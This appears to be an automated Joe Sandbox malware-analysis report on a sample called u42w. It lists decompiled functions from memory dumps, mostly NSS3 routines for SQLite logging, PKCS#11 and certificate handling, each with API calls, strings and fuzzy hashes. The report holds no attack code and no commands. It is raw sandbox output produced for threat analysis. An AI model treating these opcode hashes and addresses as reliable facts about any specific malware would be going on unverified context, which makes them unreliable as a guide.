Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: Util$K11_$Tag_$Item_$FindZfree$Algorithmfree$ContextLength$Alloc_BlockCreateDestroyFreeInternalSizeSlot
String ID:
API String ID: 3136566230-0
Opcode ID: d342dd1b7cbae0795fdd17c7e8312a1e1a57004702d547770ee854922058ce93
Instruction ID: 4033eaa208a818f07ebca8d1bac4d10ec9bc3c7c030804549281fd1ce5222fc4
Opcode Fuzzy Hash: d342dd1b7cbae0795fdd17c7e8312a1e1a57004702d547770ee854922058ce93
Instruction Fuzzy Hash: 6B41A1F1A01346ABEB009F64AC45BAF7678AF2430CF144124E9196B741E735EA58CBE3

Uniqueness

Uniqueness Score: -1.00%

Function 6C8D2400 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 125COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,bind on a busy prepared statement: [%s],?), ref: 6C8D24EC
sqlite3_log.NSS3(00000015,API called with NULL prepared statement,?,?,?,?,?,6C8D2315), ref: 6C8D254F
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,000151C9,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,6C8D2315), ref: 6C8D256C

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C8D24F4, 6C8D2557
%s at line %d of [%.10s], xrefs: 6C8D2566
API called with finalized prepared statement, xrefs: 6C8D2543, 6C8D254D
bind on a busy prepared statement: [%s], xrefs: 6C8D24E6
misuse, xrefs: 6C8D2561
API called with NULL prepared statement, xrefs: 6C8D253C

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API called with NULL prepared statement$API called with finalized prepared statement$bind on a busy prepared statement: [%s]$misuse
API String ID: 632333372-2222229625
Opcode ID: d142a1eb70b0345ded195136f0a9d272807acf61598f8d4dd30feb989d392174
Instruction ID: 13a6d8ac61c29066e560ca195beddb82f8c54b8be90d72e2399c4fade7f50e67
Opcode Fuzzy Hash: d142a1eb70b0345ded195136f0a9d272807acf61598f8d4dd30feb989d392174
Instruction Fuzzy Hash: D441E1717006018BE7249F19E9A8B6777B6BF8131AF164D2CE8055BB40DB3AFC46C791

Uniqueness

Uniqueness Score: -1.00%

Function 6C986C40 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 87COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DigestInit), ref: 6C986C66
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C986C94
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C986CA3

Part of subcall function 6CA6D930: PL_strncpyz.NSS3(?,?,?), ref: 6CA6D963

PR_LogPrint.NSS3(?,00000000), ref: 6C986CB9
PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6C986CD5

Strings

C_DigestInit, xrefs: 6C986C61
hSession = 0x%x, xrefs: 6C986C7E, 6C986C8E
(CK_INVALID_HANDLE), xrefs: 6C986C9C
pMechanism = 0x%p, xrefs: 6C986CD0

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pMechanism = 0x%p$ (CK_INVALID_HANDLE)$C_DigestInit
API String ID: 1003633598-3690128261
Opcode ID: 835f0ff183a2cd214ff09c0ae3a2875a3358d9c20b452f9d9f5ca527ef0b3642
Instruction ID: 1ab46863bc446265210733b827104152cc8441d5e034b40498cf0788479b4273
Opcode Fuzzy Hash: 835f0ff183a2cd214ff09c0ae3a2875a3358d9c20b452f9d9f5ca527ef0b3642
Instruction Fuzzy Hash: 722136716022059FDB049F55AE48B8A7BB5EB5231CF048425E509AFB21DB30D88DC7A9

Uniqueness

Uniqueness Score: -1.00%

Function 6C956DB0 Relevance: 15.2, APIs: 10, Instructions: 200memoryCOMMON

Download Yara Rule

APIs

SECITEM_ArenaDupItem_Util.NSS3(?,6C957D8F,6C957D8F,?,?), ref: 6C956DC8

Part of subcall function 6C9AFDF0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6C9AFE08
Part of subcall function 6C9AFDF0: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6C9AFE1D
Part of subcall function 6C9AFDF0: memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6C9AFE62

PORT_ArenaAlloc_Util.NSS3(?,00000010,?,?,6C957D8F,?,?), ref: 6C956DD5

Part of subcall function 6C9B10C0: TlsGetValue.KERNEL32(?,6C958802,00000000,00000008,?,6C94EF74,00000000), ref: 6C9B10F3
Part of subcall function 6C9B10C0: EnterCriticalSection.KERNEL32(?,?,6C958802,00000000,00000008,?,6C94EF74,00000000), ref: 6C9B110C
Part of subcall function 6C9B10C0: PL_ArenaAllocate.NSS3(?,?,?,6C958802,00000000,00000008,?,6C94EF74,00000000), ref: 6C9B1141
Part of subcall function 6C9B10C0: PR_Unlock.NSS3(?,?,?,6C958802,00000000,00000008,?,6C94EF74,00000000), ref: 6C9B1182
Part of subcall function 6C9B10C0: TlsGetValue.KERNEL32(?,6C958802,00000000,00000008,?,6C94EF74,00000000), ref: 6C9B119C

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CA78FA0,00000000,?,?,?,?,6C957D8F,?,?), ref: 6C956DF7

Part of subcall function 6C9AB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CA818D0,?), ref: 6C9AB095

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C956E35

Part of subcall function 6C9AFDF0: PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6C9AFE29
Part of subcall function 6C9AFDF0: PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6C9AFE3D
Part of subcall function 6C9AFDF0: free.MOZGLUE(00000000,?,?,?,?), ref: 6C9AFE6F

PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C956E4C

Part of subcall function 6C9B10C0: PL_ArenaAllocate.NSS3(?,6C958802,00000000,00000008,?,6C94EF74,00000000), ref: 6C9B116E

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CA78FE0,00000000), ref: 6C956E82

Part of subcall function 6C956AF0: SECITEM_ArenaDupItem_Util.NSS3(00000000,6C95B21D,00000000,00000000,6C95B219,?,6C956BFB,00000000,?,00000000,00000000,?,?,?,6C95B21D), ref: 6C956B01
Part of subcall function 6C956AF0: SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,00000000), ref: 6C956B8A

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C956F1E
PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C956F35
SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CA78FE0,00000000), ref: 6C956F6B
PR_SetError.NSS3(FFFFE005,00000000,6C957D8F,?,?), ref: 6C956FE1

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: Util$Arena$Item_$Alloc_$DecodeQuick$AllocateErrorValue$CriticalEnterSectionUnlockfreememcpy
String ID:
API String ID: 587344769-0
Opcode ID: 30892eff0f84eebdbef4175b874f436d3325f0b356421feea16133c49ff8b463
Instruction ID: 505c11f4729f6718388158eefc3089d88e1ce45948228e7dda012569d1c9ace5
Opcode Fuzzy Hash: 30892eff0f84eebdbef4175b874f436d3325f0b356421feea16133c49ff8b463
Instruction Fuzzy Hash: 38717171E106469FEB00CF55CD40BAABBA8BF65308F554229EC48D7B11F771EAA4CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6C974CA0 Relevance: 15.1, APIs: 10, Instructions: 142COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,00000000,00000000,?,6C97AB7F,?,00000000,?), ref: 6C974CB4
EnterCriticalSection.KERNEL32(0000001C,?,6C97AB7F,?,00000000,?), ref: 6C974CC8
TlsGetValue.KERNEL32(?,6C97AB7F,?,00000000,?), ref: 6C974CE0
EnterCriticalSection.KERNEL32(?,?,6C97AB7F,?,00000000,?), ref: 6C974CF4
PL_HashTableLookup.NSS3(?,?,?,6C97AB7F,?,00000000,?), ref: 6C974D03
PR_Unlock.NSS3(?,00000000,?), ref: 6C974D10

Part of subcall function 6C9FDD70: TlsGetValue.KERNEL32 ref: 6C9FDD8C
Part of subcall function 6C9FDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C9FDDB4

PR_Now.NSS3(?,00000000,?), ref: 6C974D26

Part of subcall function 6CA19DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CA60A27), ref: 6CA19DC6
Part of subcall function 6CA19DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CA60A27), ref: 6CA19DD1
Part of subcall function 6CA19DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CA19DED

PR_Unlock.NSS3(?,?,00000000,?), ref: 6C974D98
PR_Unlock.NSS3(?,?,?,00000000,?), ref: 6C974DDA
PR_Unlock.NSS3(?,?,?,?,00000000,?), ref: 6C974E02

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: Unlock$CriticalSectionTimeValue$EnterSystem$FileHashLeaveLookupTableUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 4032354334-0
Opcode ID: 51a8fa736b7efc8bc0f6e58ac670ca362e77866d3d6716d6bc6342a6cd570355
Instruction ID: 4f83d2eb92e4a30edfd4cf0bda1e19292cedd8f7f8b4389d2531ff9ed6661636
Opcode Fuzzy Hash: 51a8fa736b7efc8bc0f6e58ac670ca362e77866d3d6716d6bc6342a6cd570355
Instruction Fuzzy Hash: 7B41A8B69002059BEB115F65ED44A6A77B8BF2525CF058170EC18C7B12FB31E925CFB1

Uniqueness

Uniqueness Score: -1.00%

Function 6C99CC70 Relevance: 13.8, APIs: 9, Instructions: 313COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,00000100,?), ref: 6C99CD08
PK11_DoesMechanism.NSS3(?,?), ref: 6C99CE16
PR_SetError.NSS3(00000000,00000000), ref: 6C99D079

Part of subcall function 6C9FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C9FC2BF

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: DoesErrorK11_MechanismValuememcpy
String ID:
API String ID: 1351604052-0
Opcode ID: 3356c0008829499190989271beaaef6605331684be0c56895cbca96551bc02b6
Instruction ID: 521f93edbd80027f6711adf916292422cc4ae31cbb1056774094cf2ea291d893
Opcode Fuzzy Hash: 3356c0008829499190989271beaaef6605331684be0c56895cbca96551bc02b6
Instruction Fuzzy Hash: 82C181B5A002199BDB10CF24CC80BDAB7B8BF58318F1841A8E94DA7741E775EE95CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6C952C30 Relevance: 13.7, APIs: 9, Instructions: 166memoryCOMMON

Download Yara Rule

APIs

PORT_ZAlloc_Util.NSS3(282313D0), ref: 6C952C5D

Part of subcall function 6C9B0D30: calloc.MOZGLUE ref: 6C9B0D50
Part of subcall function 6C9B0D30: TlsGetValue.KERNEL32 ref: 6C9B0D6D

CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001), ref: 6C952C8D
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C952CE0

Part of subcall function 6C952E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C952CDA,?,00000000), ref: 6C952E1E
Part of subcall function 6C952E00: SECITEM_DupItem_Util.NSS3(?), ref: 6C952E33
Part of subcall function 6C952E00: TlsGetValue.KERNEL32 ref: 6C952E4E
Part of subcall function 6C952E00: EnterCriticalSection.KERNEL32(?), ref: 6C952E5E
Part of subcall function 6C952E00: PL_HashTableLookup.NSS3(?), ref: 6C952E71
Part of subcall function 6C952E00: PL_HashTableRemove.NSS3(?), ref: 6C952E84
Part of subcall function 6C952E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6C952E96
Part of subcall function 6C952E00: PR_Unlock.NSS3 ref: 6C952EA9

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C952D23
CERT_IsCACert.NSS3(00000001,00000000), ref: 6C952D30
CERT_MakeCANickname.NSS3(00000001), ref: 6C952D3F
free.MOZGLUE(00000000), ref: 6C952D73
CERT_DestroyCertificate.NSS3(?), ref: 6C952DB8
free.MOZGLUE ref: 6C952DC8

Part of subcall function 6C953E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C953EC2
Part of subcall function 6C953E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C953ED6
Part of subcall function 6C953E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C953EEE
Part of subcall function 6C953E60: PR_CallOnce.NSS3(6CAB2AA4,6C9B12D0), ref: 6C953F02
Part of subcall function 6C953E60: PL_FreeArenaPool.NSS3 ref: 6C953F14
Part of subcall function 6C953E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C953F27

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: Util$Item_$HashTable$ArenaCertificatePoolValueZfreefree$Alloc_CallCertCopyCriticalDecodeDestroyEnterErrorFreeInitLookupMakeNicknameOnceQuickRemoveSectionTempUnlockcalloc
String ID:
API String ID: 3941837925-0
Opcode ID: caeb05856fe9cd841296fc6ab9454c1c6b37fcccf8c818d9e45da79172d90878
Instruction ID: 5bb06e3606b85eb9d2dd170853c6f46ba2eaca461caed1be12b007a5e882d08c
Opcode Fuzzy Hash: caeb05856fe9cd841296fc6ab9454c1c6b37fcccf8c818d9e45da79172d90878
Instruction Fuzzy Hash: 7351FF72A047169BEB01DF68DC88B6B77E9EFA4348F540428EC5983650E731E825CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6C98ACC0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 76COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_MessageDecryptFinal), ref: 6C98ACE6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C98AD14
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C98AD23

Part of subcall function 6CA6D930: PL_strncpyz.NSS3(?,?,?), ref: 6CA6D963

PR_LogPrint.NSS3(?,00000000), ref: 6C98AD39

Strings

C_MessageDecryptFinal, xrefs: 6C98ACE1
hSession = 0x%x, xrefs: 6C98ACFE, 6C98AD0E
(CK_INVALID_HANDLE), xrefs: 6C98AD1C

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: L_strncpyzPrint$L_strcatn
String ID: hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageDecryptFinal
API String ID: 332880674-3521875567
Opcode ID: 01e7b02d7df51c0eeb27e9eeeee1e026ad51b2efa3dfe7a5d4bec451b5f6fddb
Instruction ID: aa2ea971fbc023850e21ce827d8aa9010188533b7581bb79103c78aef865fbd2
Opcode Fuzzy Hash: 01e7b02d7df51c0eeb27e9eeeee1e026ad51b2efa3dfe7a5d4bec451b5f6fddb
Instruction Fuzzy Hash: 28212F716022059FD7049F54ED48B6A7775BB5130DF048925E40ADBBA1DF30D84EC7A6

Uniqueness

Uniqueness Score: -1.00%

Function 6C968CF0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 76COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,?,6C97124D,00000001), ref: 6C968D19
EnterCriticalSection.KERNEL32(?,?,?,?,6C97124D,00000001), ref: 6C968D32
PL_ArenaRelease.NSS3(?,?,?,?,?,6C97124D,00000001), ref: 6C968D73
PR_Unlock.NSS3(?,?,?,?,?,6C97124D,00000001), ref: 6C968D8C

Part of subcall function 6C9FDD70: TlsGetValue.KERNEL32 ref: 6C9FDD8C
Part of subcall function 6C9FDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C9FDDB4

PR_Unlock.NSS3(?,?,?,?,?,6C97124D,00000001), ref: 6C968DBA

Strings

KRAM, xrefs: 6C968D3E
KRAM, xrefs: 6C968CF9

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: CriticalSectionUnlockValue$ArenaEnterLeaveRelease
String ID: KRAM$KRAM
API String ID: 2419422920-169145855
Opcode ID: c5ac457ec79a0461a8f2bcd5f36e87de0de40bed24d56a52d31b529ed7b1c972
Instruction ID: 5611ddd76d925f96a0b624897365ddad6570038a32934e280a40e95436925019
Opcode Fuzzy Hash: c5ac457ec79a0461a8f2bcd5f36e87de0de40bed24d56a52d31b529ed7b1c972
Instruction Fuzzy Hash: D321A0B1A046018FEB08EF3AC48415AB7F4FF56308F15896AD99887B41E734D842CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00418843 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0041884F

Part of subcall function 00417B2C: __getptd_noexit.LIBCMT ref: 00417B2F
Part of subcall function 00417B2C: __amsg_exit.LIBCMT ref: 00417B3C

__amsg_exit.LIBCMT ref: 0041886F
__lock.LIBCMT ref: 0041887F
InterlockedDecrement.KERNEL32(?), ref: 0041889C
_free.LIBCMT ref: 004188AF
InterlockedIncrement.KERNEL32(00423530), ref: 004188C7

Strings

05B, xrefs: 004188B5, 004188BD

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
String ID: 05B
API String ID: 3470314060-3788103304
Opcode ID: cb1538446801220004b0e94d2aebbf41e1672ae537431284a663a37179733970
Instruction ID: f16d68fd9582ac4125616c5e50f94de62243aa4c7be40d45a23fde697d24a6fa
Opcode Fuzzy Hash: cb1538446801220004b0e94d2aebbf41e1672ae537431284a663a37179733970
Instruction Fuzzy Hash: 4501AD32A05621ABD720BF6A98057CA7770AF04725F90402FF810A3390CB7CA9C2CBDD

Uniqueness

Uniqueness Score: -1.00%

Function 6CA24D80 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 36COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6CA24DC3
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CA4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CA24DE0

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CA24DCB
%s at line %d of [%.10s], xrefs: 6CA24DDA
invalid, xrefs: 6CA24DB8
API call with %s database connection pointer, xrefs: 6CA24DBD
misuse, xrefs: 6CA24DD5

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
API String ID: 632333372-2974027950
Opcode ID: 6e5e4dc3d2d2a861c7061fec7be6a456874a40bddfd00bc6aae3c2aa49ab1552
Instruction ID: 2726cbe2fa06ac9c01dc2ef8797eb7fb9713d408cd84665afceeb5fea405d5d8
Opcode Fuzzy Hash: 6e5e4dc3d2d2a861c7061fec7be6a456874a40bddfd00bc6aae3c2aa49ab1552
Instruction Fuzzy Hash: 26F0E921F156746FD7005115CD11F8637A96F1132DF4E09E1ED046BE92E20DECD082E1

Uniqueness

Uniqueness Score: -1.00%

Function 6CA24DF0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 35COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6CA24E30
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CAD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CA24E4D

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CA24E38
%s at line %d of [%.10s], xrefs: 6CA24E47
invalid, xrefs: 6CA24E25
API call with %s database connection pointer, xrefs: 6CA24E2A
misuse, xrefs: 6CA24E42

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
